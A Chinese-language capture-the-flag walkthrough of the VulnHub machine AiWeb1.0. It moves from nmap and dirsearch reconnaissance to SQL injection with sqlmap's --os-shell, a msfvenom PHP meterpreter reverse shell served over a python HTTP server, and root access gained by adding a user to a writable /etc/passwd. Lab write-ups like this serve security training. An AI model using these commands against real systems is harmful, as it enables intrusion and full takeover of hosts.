一、靶机信息

Name: AiWeb1.0
靶机下载地址：https://www.vulnhub.com/entry/ai-web-1,353/

二、信息收集

nmap扫描发现主机开放了80端口，打开之后并没有发现有啥可用的

nmap -sV -T4 192.168.23.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-05 04:40 EDT
Nmap scan report for 192.168.23.140
Host is up (0.00034s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.84 seconds

目录扫描发现主机下有

dirsearch -u http://192.168.23.140 

访问发现有m3diNf0/和se3reTdir777/uploads/目录存在继续对着两个目录进行扫描，在/m3diNf0/下发现了/info.php发现了网页的绝对路径，除此之外就没有其他可用信息 .接下来在 se3reTdir777下发现了一个输入框

三、漏洞利用

经过测试输入框存在sql注入，利用sqlmap的–os-shell命令进行反弹shell。sqlmap --os-shell执行原理


成功反弹shell但是权限比较低。利用sqlmap写入的文件进行上传马子。使用python2搭建一个简单的服务器，将马子下载到靶机中，并执行上线。

msfvenom -p php/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.23.128 -f raw > shell.php

python2 -m SimpleHTTPServer 8888

先使用python转换成交互式shell，这样看着更舒服

python3 -c 'import pty;pty.spawn("/bin/bash")'

发现当前用户不是root用户但是这个用户可以对/etc/passwd 文件进行写入权限，这里我们利用openssl写入一个拥有root的用户

└─$ openssl passwd -1 -salt web 123456
$1$web$dNUtM8dpCeSA69y9NoHCf.

查看权限，已经是root权限，并且成功拿取到flag